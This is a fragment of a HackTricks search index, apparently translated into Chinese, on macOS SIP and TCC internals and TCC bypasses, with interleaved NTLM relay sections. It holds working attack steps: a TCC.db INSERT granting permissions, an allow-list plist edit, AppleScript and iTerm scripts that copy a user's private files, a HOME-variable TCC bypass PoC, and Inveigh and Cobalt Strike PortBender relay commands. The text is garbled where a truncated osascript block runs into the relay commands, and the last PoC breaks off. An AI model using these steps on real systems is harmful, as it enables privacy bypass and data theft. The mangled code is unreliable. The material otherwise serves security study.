FileVault: Yes (Unlocked) 在之前的输出中,可以看到 用户可访问的位置 被挂载在 /System/Volumes/Data 下。 此外, macOS 系统卷快照 被挂载在 / 并且是 密封的 (由操作系统进行加密签名)。因此,如果绕过 SIP 并进行修改, 操作系统将无法启动 。 还可以通过运行以下命令 验证密封是否启用 : bash csrutil authenticated-root status\\nAuthenticated Root status: enabled 此外,快照磁盘也被挂载为 只读 : bash mount\\n/dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 检查快照","id":"2643","title":"检查快照"},"2644":{"body":"Reading time: 23 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC","id":"2644","title":"macOS TCC"},"2645":{"body":"TCC (透明性、同意和控制) 是一个安全协议,专注于规范应用程序权限。其主要作用是保护敏感功能,如 位置服务、联系人、照片、麦克风、相机、辅助功能和完整磁盘访问 。通过在授予应用程序访问这些元素之前要求用户明确同意,TCC 增强了隐私和用户对其数据的控制。 当应用程序请求访问受保护的功能时,用户会遇到 TCC。这通过一个提示可见,允许用户 批准或拒绝访问 。此外,TCC 还支持用户的直接操作,例如 将文件拖放到应用程序中 ,以授予对特定文件的访问,确保应用程序仅访问明确允许的内容。 TCC 提示的示例 TCC 由位于 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd 的 守护进程 处理,并在 /System/Library/LaunchDaemons/com.apple.tccd.system.plist 中配置(注册 mach 服务 com.apple.tccd.system)。 每个登录用户都有一个 用户模式 tccd 在运行,定义在 /System/Library/LaunchAgents/com.apple.tccd.plist 中,注册 mach 服务 com.apple.tccd 和 com.apple.usernotifications.delegate.com.apple.tccd。 在这里你可以看到 tccd 作为系统和用户运行: bash ps -ef | grep tcc\\n0 374 1 0 Thu07PM ?? 2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system\\n501 63079 1 0 6:59PM ?? 0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd 权限是 从父应用程序继承 的, 权限 是 根据 Bundle ID 和 Developer ID 跟踪 的。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 基本信息","id":"2645","title":"基本信息"},"2646":{"body":"允许/拒绝的信息存储在一些 TCC 数据库中: 系统范围的数据库在 /Library/Application Support/com.apple.TCC/TCC.db 。 该数据库是 SIP 保护 的,因此只有 SIP 绕过才能写入。 用户 TCC 数据库 $HOME/Library/Application Support/com.apple.TCC/TCC.db 用于每个用户的偏好设置。 该数据库受到保护,因此只有具有高 TCC 权限的进程(如完全磁盘访问)才能写入(但它不受 SIP 保护)。 warning 之前的数据库也 受到 TCC 保护以进行读取访问 。因此,除非是来自 TCC 特权进程,否则您 无法读取 常规用户 TCC 数据库。 但是,请记住,具有这些高权限的进程(如 FDA 或 kTCCServiceEndpointSecurityClient )将能够写入用户的 TCC 数据库。 还有一个 第三个 TCC 数据库在 /var/db/locationd/clients.plist 中,指示允许 访问位置服务 的客户端。 SIP 保护的文件 /Users/carlospolop/Downloads/REG.db (也受到 TCC 的读取访问保护)包含所有 有效 TCC 数据库 的 位置 。 SIP 保护的文件 /Users/carlospolop/Downloads/MDMOverrides.plist (也受到 TCC 的读取访问保护)包含更多 TCC 授予的权限。 SIP 保护的文件 /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (任何人可读)是需要 TCC 例外的应用程序的允许列表。 tip iOS 中的 TCC 数据库在 /private/var/mobile/Library/TCC/TCC.db 。 tip 通知中心 UI 可以对 系统 TCC 数据库 进行 更改 : codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/> Support/tccd\\n[..]\\ncom.apple.private.tcc.manager\\ncom.apple.rootless.storage.TCC 但是,用户可以使用 tccutil 命令行工具 删除或查询规则 。 查询数据库 user DB\\nsystem DB bash sqlite3 ~/Library/Application\\\\ Support/com.apple.TCC/TCC.db\\nsqlite> .schema\\n# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id\\n# The table access contains the permissions per services\\nsqlite> select service, client, auth_value, auth_reason from access;\\nkTCCServiceLiverpool|com.apple.syncdefaultsd|2|4\\nkTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2\\nkTCCServiceMicrophone|us.zoom.xos|2|2\\n[...] # Check user approved permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=2;\\n# Check user denied permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=0; bash sqlite3 /Library/Application\\\\ Support/com.apple.TCC/TCC.db\\nsqlite> .schema\\n# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id\\n# The table access contains the permissions per services\\nsqlite> select service, client, auth_value, auth_reason from access;\\nkTCCServiceLiverpool|com.apple.syncdefaultsd|2|4\\nkTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2\\nkTCCServiceMicrophone|us.zoom.xos|2|2\\n[...] # Get all FDA\\nsqlite> select service, client, auth_value, auth_reason from access where service = \\"kTCCServiceSystemPolicyAllFiles\\" and auth_value=2; # Check user approved permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=2;\\n# Check user denied permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=0; tip 检查两个数据库,您可以查看应用程序允许、禁止或没有的权限(它会请求权限)。 service 是 TCC 权限 的字符串表示 client 是具有权限的 bundle ID 或 二进制路径 client_type 指示它是 Bundle Identifier(0) 还是绝对路径(1) 如果是绝对路径,如何执行 只需执行 launctl load you_bin.plist ,plist 如下: xml \\n\\n\\n\\n\\nLabel\\ncom.example.yourbinary \\nProgram\\n/path/to/binary \\nProgramArguments\\n\\narg1\\narg2\\n \\nRunAtLoad\\n \\nKeepAlive\\n \\nStandardOutPath\\n/tmp/YourBinary.stdout\\nStandardErrorPath\\n/tmp/YourBinary.stderr\\n\\n auth_value 可以有不同的值:denied(0)、unknown(1)、allowed(2) 或 limited(3)。 auth_reason 可以取以下值:Error(1)、User Consent(2)、User Set(3)、System Set(4)、Service Policy(5)、MDM Policy(6)、Override Policy(7)、Missing usage string(8)、Prompt Timeout(9)、Preflight Unknown(10)、Entitled(11)、App Type Policy(12) csreq 字段用于指示如何验证要执行的二进制文件并授予 TCC 权限: bash # Query to get cserq in printable hex\\nselect service, client, hex(csreq) from access where auth_value=2; # To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):\\nBLOB=\\"FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003\\"\\necho \\"$BLOB\\" | xxd -r -p > terminal-csreq.bin\\ncsreq -r- -t < terminal-csreq.bin # To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):\\nREQ_STR=$(codesign -d -r- /Applications/Utilities/Terminal.app/ 2>&1 | awk -F \' => \' \'/designated/{print $2}\')\\necho \\"$REQ_STR\\" | csreq -r- -b /tmp/csreq.bin\\nREQ_HEX=$(xxd -p /tmp/csreq.bin | tr -d \'\\\\n\')\\necho \\"X\'$REQ_HEX\'\\" 有关表格中 其他字段 的更多信息,请 查看这篇博客文章 。 您还可以在System Preferences --> Security & Privacy --> Privacy --> Files and Folders中检查 已授予的权限 。 tip 用户_可以_使用**tccutil** 删除或查询规则 。 重置 TCC 权限 bash # You can reset all the permissions given to an application with\\ntccutil reset All app.some.id # Reset the permissions granted to all apps\\ntccutil reset All","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 数据库","id":"2646","title":"TCC 数据库"},"2647":{"body":"TCC 数据库 存储应用程序的 Bundle ID ,但它还 存储 信息 关于 签名 以 确保 请求使用权限的应用是正确的。 bash # From sqlite\\nsqlite> select service, client, hex(csreq) from access where auth_value=2;\\n#Get csreq # From bash\\necho FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin\\n## Get signature checks\\ncsreq -t -r /tmp/telegram_csreq.bin\\n(anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \\"6N38VWS5BX\\") and identifier \\"ru.keepcoder.Telegram\\" warning 因此,使用相同名称和包 ID 的其他应用程序将无法访问授予其他应用程序的权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 签名检查","id":"2647","title":"TCC 签名检查"},"2648":{"body":"应用程序 不仅需要 请求 并且已经 获得访问 某些资源的权限,它们还需要 拥有相关的权限 。 例如 Telegram 拥有权限 com.apple.security.device.camera 来请求 访问相机 。一个 没有 这个 权限的应用 将无法访问相机(用户甚至不会被询问权限)。 然而,对于应用程序 访问 某些用户文件夹,如 ~/Desktop、~/Downloads 和 ~/Documents,它们 不需要 任何特定的 权限 。系统将透明地处理访问并 根据需要提示用户 。 苹果的应用程序 不会生成提示 。它们在其 权限 列表中包含 预先授予的权利 ,这意味着它们 永远不会生成弹出窗口 , 也 不会出现在任何 TCC 数据库 中。例如: bash codesign -dv --entitlements :- /System/Applications/Calendar.app\\n[...]\\ncom.apple.private.tcc.allow\\n\\nkTCCServiceReminders\\nkTCCServiceCalendar\\nkTCCServiceAddressBook\\n 这将避免日历请求用户访问提醒、日历和地址簿。 tip 除了一些关于权限的官方文档外,还可以找到关于权限的非官方 有趣信息 在 https://newosxbook.com/ent.jl 一些 TCC 权限包括:kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... 没有公开的列表定义所有权限,但您可以查看这个 已知权限列表 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 权限与 TCC 权限","id":"2648","title":"权限与 TCC 权限"},"2649":{"body":"$HOME(本身) $HOME/.ssh, $HOME/.aws, 等等 /tmp","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 敏感未保护位置","id":"2649","title":"敏感未保护位置"},"265":{"body":"Inveigh 是一个针对 Windows 系统的渗透测试人员和红队成员设计的工具。它提供类似于 Responder 的功能,执行欺骗和中间人攻击。该工具已从 PowerShell 脚本演变为 C# 二进制文件,主要版本为 Inveigh 和 InveighZero 。详细参数和说明可以在 wiki 中找到。 Inveigh 可以通过 PowerShell 操作: bash Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y 或作为 C# 二进制文件执行: bash Inveigh.exe","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Inveigh","id":"265","title":"Inveigh"},"2650":{"body":"如前所述,可以通过将文件拖放到应用程序上来 授予应用程序对文件的访问权限 。此访问权限不会在任何 TCC 数据库中指定,而是作为文件的 扩展****属性 。此属性将 存储允许的应用程序的 UUID : bash xattr Desktop/private.txt\\ncom.apple.macl # Check extra access to the file\\n## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command\\nmacl_read Desktop/private.txt\\nFilename,Header,App UUID\\n\\"Desktop/private.txt\\",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3 # Get the UUID of the app\\notool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid\\nuuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3 tip 有趣的是, com.apple.macl 属性是由 Sandbox 管理的,而不是 tccd。 还要注意,如果您将允许计算机上某个应用程序的 UUID 的文件移动到另一台计算机,由于同一应用程序将具有不同的 UID,它将无法授予该应用程序访问权限。 扩展属性 com.apple.macl 无法像其他扩展属性那样被清除 ,因为它是 受 SIP 保护的 。然而,正如 在这篇文章中解释的 ,可以通过 压缩 文件、 删除 它和 解压缩 它来禁用它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 用户意图 / com.apple.macl","id":"2650","title":"用户意图 / com.apple.macl"},"2651":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 权限提升与绕过","id":"2651","title":"TCC 权限提升与绕过"},"2652":{"body":"如果您在某个时刻成功获得 TCC 数据库的写入访问权限,可以使用以下内容添加条目(删除注释): 插入到 TCC 示例\\nsql INSERT INTO access (\\nservice,\\nclient,\\nclient_type,\\nauth_value,\\nauth_reason,\\nauth_version,\\ncsreq,\\npolicy_id,\\nindirect_object_identifier_type,\\nindirect_object_identifier,\\nindirect_object_code_identity,\\nflags,\\nlast_modified,\\npid,\\npid_version,\\nboot_uuid,\\nlast_reminded\\n) VALUES (\\n\'kTCCServiceSystemPolicyDesktopFolder\', -- service\\n\'com.googlecode.iterm2\', -- client\\n0, -- client_type (0 - bundle id)\\n2, -- auth_value (2 - allowed)\\n3, -- auth_reason (3 - \\"User Set\\")\\n1, -- auth_version (always 1)\\nX\'FADE0C00000000C40000000100000006000000060000000F0000000200000015636F6D2E676F6F676C65636F64652E697465726D32000000000000070000000E000000000000000A2A864886F7636406010900000000000000000006000000060000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A483756375859565137440000\', -- csreq is a BLOB, set to NULL for now\\nNULL, -- policy_id\\nNULL, -- indirect_object_identifier_type\\n\'UNUSED\', -- indirect_object_identifier - default value\\nNULL, -- indirect_object_code_identity\\n0, -- flags\\nstrftime(\'%s\', \'now\'), -- last_modified with default current timestamp\\nNULL, -- assuming pid is an integer and optional\\nNULL, -- assuming pid_version is an integer and optional\\n\'UNUSED\', -- default value for boot_uuid\\nstrftime(\'%s\', \'now\') -- last_reminded with default current timestamp\\n);","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 插入到 TCC","id":"2652","title":"插入到 TCC"},"2653":{"body":"如果你成功进入了一个具有某些 TCC 权限的应用程序,请查看以下页面以获取 TCC 负载以进行滥用: macOS TCC Payloads","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC Payloads","id":"2653","title":"TCC Payloads"},"2654":{"body":"了解 Apple Events 的内容: macOS Apple Events","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » Apple Events","id":"2654","title":"Apple Events"},"2655":{"body":"TCC 权限的 Automation 名称是: kTCCServiceAppleEvents 这个特定的 TCC 权限还指示了 可以在 TCC 数据库中管理的应用程序 (因此权限并不允许管理所有内容)。 Finder 是一个 始终具有 FDA 的应用程序(即使它在 UI 中不显示),因此如果你对它拥有 Automation 权限,你可以滥用其权限以 执行某些操作 。 在这种情况下,你的应用程序需要对 com.apple.Finder 拥有权限 kTCCServiceAppleEvents 。 Steal users TCC.db\\nSteal systems TCC.db applescript # This AppleScript will copy the system TCC database into /tmp\\nosascript< \\"/tmp/script.js\\" < Script Manager -> Load (Select PortBender.cna) beacon> cd C:\\\\Windows\\\\system32\\\\drivers # Navigate to drivers directory\\nbeacon> upload C:\\\\PortBender\\\\WinDivert64.sys # Upload driver\\nbeacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445\\nbeacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server\\nbeacon> socks 1080 # Establish a SOCKS proxy on port 1080 # Termination commands\\nbeacon> jobs\\nbeacon> jobkill 0\\nbeacon> rportfwd stop 8445\\nbeacon> socks stop","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » NTLM Relay Attack","id":"266","title":"NTLM Relay Attack"},"2660":{"body":"kTCCServiceSystemPolicySysAdminFiles 允许 更改 用户的 NFSHomeDirectory 属性,这会更改他的主文件夹,从而允许 绕过 TCC 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 系统策略 SysAdmin 文件到 FDA","id":"2660","title":"系统策略 SysAdmin 文件到 FDA"},"2661":{"body":"获得 用户 TCC 数据库的 写权限 你 不能 授予自己 FDA 权限,只有系统数据库中的用户可以授予该权限。 但你可以 授予 自己 Finder 的自动化权限 ,并滥用之前的技术提升到 FDA*。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 用户 TCC 数据库到 FDA","id":"2661","title":"用户 TCC 数据库到 FDA"},"2662":{"body":"完全磁盘访问 在 TCC 中的名称是 kTCCServiceSystemPolicyAllFiles 我认为这不是真正的权限提升,但以防你觉得有用:如果你控制一个具有 FDA 的程序,你可以 修改用户的 TCC 数据库并授予自己任何访问权限 。这可以作为一种持久性技术,以防你可能失去 FDA 权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » FDA 到 TCC 权限","id":"2662","title":"FDA 到 TCC 权限"},"2663":{"body":"系统 TCC 数据库 受到 SIP 保护,这就是为什么只有具有 指示的权限 的进程才能修改它。因此,如果攻击者找到一个 SIP 绕过 通过一个 文件 (能够修改受 SIP 限制的文件),他将能够: 移除 TCC 数据库的保护,并授予自己所有 TCC 权限。他可以滥用这些文件中的任何一个,例如: TCC 系统数据库 REG.db MDMOverrides.plist 然而,还有另一种选择可以滥用这个 SIP 绕过以绕过 TCC ,文件 /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist 是一个需要 TCC 例外的应用程序的允许列表。因此,如果攻击者能够 移除此文件的 SIP 保护 并添加自己的 应用程序 ,该应用程序将能够绕过 TCC。 例如添加终端: bash # Get needed info\\ncodesign -d -r- /System/Applications/Utilities/Terminal.app AllowApplicationsList.plist: xml \\n\\n\\n\\nServices\\n\\nSystemPolicyAllFiles\\n\\n\\nCodeRequirement\\nidentifier "com.apple.Terminal" and anchor apple\\nIdentifierType\\nbundleID\\nIdentifier\\ncom.apple.Terminal\\n\\n\\n\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » SIP 绕过到 TCC 绕过","id":"2663","title":"SIP 绕过到 TCC 绕过"},"2664":{"body":"macOS TCC Bypasses","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 绕过","id":"2664","title":"TCC 绕过"},"2665":{"body":"https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/ https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 参考文献","id":"2665","title":"参考文献"},"2666":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS Apple Events » macOS Apple Events","id":"2666","title":"macOS Apple Events"},"2667":{"body":"Apple Events 是苹果 macOS 中的一个功能,允许应用程序相互通信。它们是 Apple Event Manager 的一部分,该组件负责处理进程间通信。该系统使一个应用程序能够向另一个应用程序发送消息,请求其执行特定操作,例如打开文件、检索数据或执行命令。 mina 守护进程是 /System/Library/CoreServices/appleeventsd,它注册了服务 com.apple.coreservices.appleevents。 每个可以接收事件的应用程序都会与此守护进程检查,提供其 Apple Event Mach Port。当一个应用程序想要向其发送事件时,该应用程序将从守护进程请求此端口。 沙盒应用程序需要特权,如 allow appleevent-send 和 (allow mach-lookup (global-name \\"com.apple.coreservices.appleevents)),才能发送事件。注意,像 com.apple.security.temporary-exception.apple-events 的权限可能会限制谁可以发送事件,这将需要像 com.apple.private.appleevents 的权限。 tip 可以使用环境变量 AEDebugSends 来记录发送的消息的信息: AEDebugSends=1 osascript -e \'tell application \\"iTerm\\" to activate\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS Apple Events » 基本信息","id":"2667","title":"基本信息"},"2668":{"body":"Reading time: 26 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » macOS TCC Bypasses","id":"2668","title":"macOS TCC Bypasses"},"2669":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 按功能","id":"2669","title":"按功能"},"267":{"body":"Metasploit : 配置代理、本地和远程主机详细信息。 smbrelayx : 用于中继 SMB 会话并执行命令或部署后门的 Python 脚本。 MultiRelay : Responder 套件中的一个工具,用于中继特定用户或所有用户,执行命令或转储哈希。 每个工具都可以配置为通过 SOCKS 代理操作,如果需要,即使在间接网络访问的情况下也能进行攻击。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 其他 NTLM 中继攻击工具","id":"267","title":"其他 NTLM 中继攻击工具"},"2670":{"body":"这不是一个绕过,这只是 TCC 的工作方式: 它不防止写入 。如果终端 没有权限读取用户的桌面,它仍然可以写入 : shell-session username@hostname ~ % ls Desktop\\nls: Desktop: Operation not permitted\\nusername@hostname ~ % echo asd > Desktop/lalala\\nusername@hostname ~ % ls Desktop\\nls: Desktop: Operation not permitted\\nusername@hostname ~ % cat Desktop/lalala\\nasd 扩展属性 com.apple.macl 被添加到新 文件 以便给 创建者应用 访问读取它的权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 写入绕过","id":"2670","title":"写入绕过"},"2671":{"body":"可以 在 TCC 提示上放置一个窗口 ,使用户 接受 而不注意。你可以在 TCC-ClickJacking ** 中找到一个 PoC。** https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » TCC ClickJacking","id":"2671","title":"TCC ClickJacking"},"2672":{"body":"攻击者可以 创建任何名称的应用 (例如 Finder、Google Chrome...)在 Info.plist 中,并使其请求访问某些 TCC 保护的位置。用户会认为是合法应用在请求此访问。 此外,可以 从 Dock 中移除合法应用并将假应用放上去 ,因此当用户点击假应用(可以使用相同的图标)时,它可以调用合法应用,请求 TCC 权限并执行恶意软件,使用户相信是合法应用请求了访问。 更多信息和 PoC 在: macOS Privilege Escalation","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » TCC 请求任意名称","id":"2672","title":"TCC 请求任意名称"},"2673":{"body":"默认情况下,通过 SSH 的访问曾经具有 \\"完全磁盘访问\\" 。为了禁用此功能,你需要将其列出但禁用(从列表中移除不会删除这些权限): 在这里你可以找到一些 恶意软件如何能够绕过此保护 的示例: https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ caution 请注意,现在要启用 SSH,你需要 完全磁盘访问","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » SSH 绕过","id":"2673","title":"SSH 绕过"},"2674":{"body":"属性 com.apple.macl 被赋予文件,以便给 某个应用程序读取它的权限。 当 拖放 文件到应用上,或当用户 双击 文件以使用 默认应用 打开时,会设置此属性。 因此,用户可以 注册一个恶意应用 来处理所有扩展,并调用 Launch Services 来 打开 任何文件(这样恶意文件将被授予读取权限)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 处理扩展 - CVE-2022-26767","id":"2674","title":"处理扩展 - CVE-2022-26767"},"2675":{"body":"权限 com.apple.private.icloud-account-access 使得与 com.apple.iCloudHelper XPC 服务进行通信成为可能,该服务将 提供 iCloud 令牌 。 iMovie 和 Garageband 拥有此权限以及其他允许的权限。 有关利用该权限 获取 iCloud 令牌 的更多 信息 ,请查看演讲: #OBTS v5.0: \\"What Happens on your Mac, Stays on Apple\'s iCloud?!\\" - Wojciech Regula","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » iCloud","id":"2675","title":"iCloud"},"2676":{"body":"具有 kTCCServiceAppleEvents 权限的应用将能够 控制其他应用 。这意味着它可能会 滥用授予其他应用的权限 。 有关 Apple 脚本的更多信息,请查看: macOS Apple Scripts 例如,如果一个应用对 iTerm 具有 自动化权限 ,例如在这个例子中 Terminal 对 iTerm 具有访问权限: 在 iTerm 上 没有 FDA 的 Terminal 可以调用具有 FDA 的 iTerm,并利用它执行操作: iterm.script tell application \\"iTerm\\"\\nactivate\\ntell current window\\ncreate tab with default profile\\nend tell\\ntell current session of current window\\nwrite text \\"cp ~/Desktop/private.txt /tmp\\"\\nend tell\\nend tell bash osascript iterm.script 通过 Finder 或者如果一个应用程序可以访问 Finder,它可以使用这样的脚本: applescript set a_user to do shell script \\"logname\\"\\ntell application \\"Finder\\"\\nset desc to path to home folder\\nset copyFile to duplicate (item \\"private.txt\\" of folder \\"Desktop\\" of folder a_user of item \\"Users\\" of disk of home) to folder desc with replacing\\nset t to paragraphs of (do shell script \\"cat \\" & POSIX path of (copyFile as alias)) as text\\nend tell\\ndo shell script \\"rm \\" & POSIX path of (copyFile as alias)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » kTCCServiceAppleEvents / 自动化","id":"2676","title":"kTCCServiceAppleEvents / 自动化"},"2677":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » By App behaviour","id":"2677","title":"By App behaviour"},"2678":{"body":"用户空间的 tccd daemon 使用 HOME env 变量从以下位置访问 TCC 用户数据库: $HOME/Library/Application Support/com.apple.TCC/TCC.db 根据 this Stack Exchange post 并且因为 TCC daemon 是通过 launchd 在当前用户的域中运行的,所以可以 控制所有传递给它的环境变量 。 因此, 攻击者可以在 launchctl 中设置 $HOME 环境 变量指向一个 受控 目录 , 重启 TCC daemon,然后 直接修改 TCC 数据库 以赋予自己 所有可用的 TCC 权限 ,而无需提示最终用户。 PoC: bash # reset database just in case (no cheating!)\\n$> tccutil reset All\\n# mimic TCC\'s directory structure from ~/Library\\n$> mkdir -p \\"/tmp/tccbypass/Library/Application Support/com.apple.TCC\\"\\n# cd into the new directory\\n$> cd \\"/tmp/tccbypass/Library/Application Support/com.apple.TCC/\\"\\n# set launchd $HOME to this temporary directory\\n$> launchctl setenv HOME /tmp/tccbypass\\n# restart the TCC daemon\\n$> launchctl stop com.apple.tccd && launchctl start 